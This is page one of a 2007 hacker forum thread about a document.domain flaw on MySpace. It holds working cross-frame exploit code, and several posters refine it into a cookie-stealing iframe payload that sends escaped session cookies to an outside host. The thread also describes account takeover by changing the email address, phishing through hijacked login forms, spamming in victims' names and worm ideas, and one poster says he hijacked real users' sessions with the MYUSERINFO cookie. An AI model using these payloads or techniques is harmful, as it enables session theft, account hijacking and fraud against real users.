Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: 12Next
Current Page: 1 of 2
MySpace's "domain generalization"
Posted by: trev
Date: January 25, 2007 08:59PM

Rsnake mentioned in the blog how MySpace's own JavaScript code makes it vulnerable so I decided to take a look at http://x.myspace.com/js/myspaceJS024.js. The code is horrible, their "creative" use of eval() is probably exploitable in more than one way. But there is also something more interesting, take a look at function generalizeDomain(). They trim the domain name leaving only myspace.com and put it into document.domain. But they forget that one can open the site as www.myspace.com. (note the dot at the end) and then document.domain will become "com.". Now all one needs is a server with a .com domain where one can put this code:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="alert(frames[0].document.cookie)"></iframe>

That's it, full control over MySpace. I tried navigating to the "edit profile" page and changing something - easy.

Careless use of document.domain seems to be a common mistake, I found a similar vulnerability in live.com (don't want to disclose it yet).

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: rsnake
Date: January 25, 2007 09:09PM

So basically what you are saying is if you can find an XSS hole in any .com domain you can steal MySpace cookies. ;) Hahah... beautiful.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: January 25, 2007 09:25PM

I don't even need to steal their cookies, I can do whatever the users can do. For example I can spam other users in their name. And I don't need to look for XSS, I can register on geocities.com and put my page there. Then I'll only need to find a way to get MySpace users to visit this page - but that shouldn't be too difficult.

Edit: It seems that one can change the email address without entering the current password. Then I guess it is possible to change it to my own email and request password recovery - and now I am the new owner of the account.



Edited 1 time(s). Last edit at 01/25/2007 09:38PM by trev.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: TrainReq
Date: January 26, 2007 12:13AM

http://nightstarproductions.com/ha.html ... doesnt work.. did i do anything wrong? or is it patched?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 26, 2007 01:12AM

That's pretty cool; I've always wondered if the fact that you can use the full or non-full domains in browsers would become exploitable somehow.

@TrainReq:

You need to send users to the .com. address, rather than the .com address, so the following link works:

http://nightstarproductions.com./ha.html

But sadly this attack doesn't work against IE, because not only are some (all?) of their cookies httpOnly, but IE also treats myspace.com and myscpace.com. as different domains, and so if you are logged into myspace.com, the user cannot get your cookies via myspace.com.

Furthermore myspace login URLs are hard coded, so it is impossible to get a user to login by sending them a link to say, some user photos where they were not logged in and be forced to login.

So yeah, while it is pretty cool, the doesn't work in IE.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: January 26, 2007 03:34AM

Yes, I tested this in Firefox, and I only tested that in IE and Opera you can access the frame's contents. However, only in Firefox the cookies for myspace.com. are in fact the same. So what one can do in Opera and IE: put a link to MySpace in the page, like "Check out this cool image!" When he clicks it the link should be opened with JavaScript using window.open() - that way the user will see that it is an authentic MySpace window (after all, they are trained to log in only on login.myspace.com) and you keep a reference to the window. I don't know much about how MySpace works, but I guess you can find a link that will require authentication, if not - fake it, you can change this window's content however you like. Changing the action of the log in form won't help, cookies are explicitly bound to "myspace.com". However, you won't need it - simply change the onsubmit handler and steal whatever the user enters there.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 26, 2007 04:26AM

That's a very good point, I (like a lot of people - I think) tend to get caught up in trying to get access to cookies, where all we need is the ability to execute actions, or get their credentials.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: eyeced
Date: January 26, 2007 08:56AM

Fuck me, thats an amazing find. Excuse the language, but that is quite magic.Well done trev.

Although could you elaborate on this please..

"I can do whatever the users can do. For example I can spam other users in their name"

Also, i think with a lot of thought and some sick ajax coding, there could be some potential here, for an amazing worm, especially after reading about being able to break cross domain restrictions in javascript.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: bubbles
Date: January 27, 2007 09:00AM

Sounds like an interesting idea for myspace resouce sites... Auto post a bulletin to advertise your website everytime someone visits it still logged into myspace.

-bubbles
http://webmastertutorials.net

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: January 29, 2007 01:14AM

eyeced, if I get an authenticated MySpace user on my site, I can open MySpace in a hidden frame. Since the cross-domain restrictions no longer work, I can simply find the link I need (e.g. "Home"), insert the dot in the domain name and click it. This vulnerability is on all MySpace subdomains so I don't have to worry about loosing control when the frame goes to some other location. I can find forms, fix their action URL and submit them.

There is some "protection" there, generalizeDomain() isn't called for a few actions like "blog.edit". However, it doesn't do unescape in the check - I didn't try but I think that replacing 'b' by %62 will make this check no longer work.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Date: January 29, 2007 10:06PM

The offending script has been removed.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: kuza55
Date: January 29, 2007 11:16PM

@phantomcircuit

Not for me it hasn't, when I go there I can still find:

function generalizeDomain()
{
	var domainArray = document.domain.split(".");
	var domainArrayLength = domainArray.length;
	if (domainArrayLength >= 2) {document.domain = domainArray[domainArrayLength - 2] + "." + domainArray[domainArrayLength - 1];}
}

Options: ReplyQuote
Re: MySpace's "domain generalization"
Date: January 30, 2007 10:43AM

That's weird when I posted that the entire javascript file was different. (yes correct url) and the document.domain property was set to myspace.com on every page.

weird.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: jeremy02
Date: February 06, 2007 08:39PM

Can you go into more detail about how to use this?


If I wanted to steal cookies, would this code suffice?


<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload=window.location('http://www.site.com?c='+document.cookie)></iframe>


Then just get the user to visit the page?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Anonymous User
Date: April 03, 2007 01:11PM

@jeremy02
That code wouldn't work because that it's only calling the cookies from site.com, while you need to call it from the iframe.
This is how it should be formatted:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="document.location="http://site.com?c="+(frames[0].document.cookie)"></iframe>

However, what trev is trying to emphasize is that you don't need to require their cookies, you can merely execute malicious commands via the hidden iframe. aka, changing their email, or spamming off multiple bulletin board messages... just to list a few of the options, that is.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 04, 2007 02:05AM

I'm confused. Are you saying that sites where you can put a dot behind the domain (.com.) and the document.domain is without the dot are exploitable?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: April 04, 2007 06:32AM

Sites that can be tricked into setting document.domain to something like "com" or "com." are exploitable - because you can load them into an iframe on your page that will change document.domain in the same way, and that gives you access to all data inside the frame.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: SW
Date: April 04, 2007 09:27AM

trev Wrote:
-------------------------------------------------------
> Sites that can be tricked into setting
> document.domain to something like "com" or "com."
> are exploitable - because you can load them into
> an iframe on your page that will change
> document.domain in the same way, and that gives
> you access to all data inside the frame.

Didn't know this. :-)

Is this thing still an issue for myspace?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 04, 2007 12:16PM

https://www.cia.gov./
?

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: April 04, 2007 07:37PM

Spyware, this site doesn't set document.domain.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Spyware
Date: April 05, 2007 01:42AM

Aah, now I got it, thanks. (Trev, check your PM box please)

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 07:52AM

actually 142teeth your code breaks due to the "

so this would be the code:

<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="document.location='http://site.com?c='+(frames[0].document.cookie)"></iframe>



Edited 1 time(s). Last edit at 04/08/2007 08:13AM by Royal2000H.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 08:40AM

trev can you or someone

show an example of how to change the person's display name or add something to their profile or anything else?

ps, stealing the cookie with what I posted above won't work because the cookie gets cut off

Options: ReplyQuote
Re: MySpace's "domain generalization"
Date: April 08, 2007 02:28PM

Royal2000H Wrote:
-------------------------------------------------------
> ps, stealing the cookie with what I posted above
> won't work because the cookie gets cut off

Escape the cookie first or each ampersands in the cookie will just get read as denoting a new variable.
c = escape(document.cookie);
That has never ceased to work for me.


Royal2000H Wrote:
-------------------------------------------------------
> trev can you or someone
>
> show an example of how to change the person's display name or add something to
> their profile or anything else?

It would be very helpful for me to see a working example too. I'm not sure where to begin. Thanks for any help in advance.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 04:52PM

digitalIllusionism Wrote:
-------------------------------------------------------
>
> Escape the cookie first or each ampersands in the
> cookie will just get read as denoting a new
> variable.
> c = escape(document.cookie);
> That has never ceased to work for me.
>
>


Thanks, that works,
here's the updated version


<script type="text/javascript">
document.domain = "com.";
</script>
<iframe src="http://home.myspace.com./" onload="stolenc = escape(frames[0].document.cookie); document.location='http://site.com?c='+(stolenc)"></iframe>

still figuring out how to use this stolen cookie, I was thinking the cookies.txt file but it says not to edit it... but maybe that's bs (I'll google it)

the more interesting part, though, is doing stuff, like I posted above

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 08, 2007 06:35PM

apparently the only cookie needed to login is called "MYUSERINFO"
the other ones are not necessary for logging in

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Spikeman
Date: April 11, 2007 01:47AM

There's no way to log in as a user by stealing their cookie unless you can spoof your IP and your user agent to be the same as theirs.

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: trev
Date: April 11, 2007 04:59AM

MySpace binds sessions to IP addresses? That would be unusual...

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Royal2000H
Date: April 14, 2007 05:24PM

Spikeman Wrote:
-------------------------------------------------------
> There's no way to log in as a user by stealing
> their cookie unless you can spoof your IP and your
> user agent to be the same as theirs.


1. spoofing user agent is easy
2. you don't need to spoof user agent or IP

I successfully stole people's cookies, applied only the MYUSERINFO cookie, and was able to be them :)

Options: ReplyQuote
Re: MySpace's "domain generalization"
Posted by: Anonymous User
Date: April 14, 2007 05:47PM

@Royal2000H,
hm, could of sworn i typed it correctly.
however, it seems to work perfect with me.

and yea, MYUSERINFO logs you in.
shame IE doesn't store it the way that's productive to, persay, us. ^_^

Options: ReplyQuote
Pages: 12Next
Current Page: 1 of 2


Sorry, only registered users may post in this forum.